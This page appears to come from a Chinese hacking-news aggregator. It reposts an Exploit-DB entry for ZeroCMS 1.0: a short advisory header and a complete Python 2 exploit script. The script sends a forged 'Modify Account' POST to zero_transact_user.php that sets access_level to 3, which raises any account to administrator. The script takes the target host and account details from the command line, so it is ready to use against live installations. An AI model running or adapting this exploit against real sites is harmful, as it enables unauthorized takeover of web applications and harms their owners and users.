记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

[webapps] - ZeroCMS 1.0 - zero_transact_user.php, Handling Privilege Escalation

2014-06-14 01:20
import sys,getopt,cookielib,urllib2,urllib

# ZeroCMS 1.0
# zero_transact_user.php
# Impropper Form post hanling, (parameter polution)
# Vendor: Another Awesome Stuff
# Product web page: http://www.aas9.in/zerocms/
# author: tiago.alexand@gmail.com
# Tested on: php 5.4.27
# OSVDB ID: 108025
# description
# Summary: ZeroCMS is a very simple Content Management
# System built using PHP and MySQL.
# the script zero_transact_user.php contains a Modify Account case
# where the execution context doen't have in to consideration the current user's permitions
# allowing a malcious user to escalate its privileges to admin.

def exploit(host,email,name,userid):
access_level = 3 # default for admin
url = host + '/zero_transact_user.php' #the script handles user related actions
args = { 'user_id':userid,'email':email, 'name':name,'access_level':access_level,'action':'Modify Account' }
data = urllib.urlencode(args)
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
response = opener.open(url,data);
print response.read()

def main(argv):
host = ''
email = ''
accountname = ''
userid = ''
try:
opts, args = getopt.getopt(argv,"hu:m:n:i:")
except getopt.GetoptError:
print 'zero_cms_privEscalation.py -u <host> -m <email> -n <account name> -i acount id'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print 'zero_cms_privEscalation.py -u <host> -m <email> -n <account name> -i acount id'
sys.exit()
elif opt in ("-u"):
host = arg
elif opt in ("-m"):
email = arg
elif opt in ("-n"):
accountname = arg
elif opt in ("-i"):
userid = arg
exploit(host,email,accountname,userid)

if __name__ == "__main__":
main(sys.argv[1:])



知识来源: www.exploit-db.com/exploits/33743

阅读:93801 | 评论:0 | 标签:webapps cms

想收藏或者和大家分享这篇好文章→复制链接地址

“[webapps] - ZeroCMS 1.0 - zero_transact_user.php, Handling Privilege Escalation”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云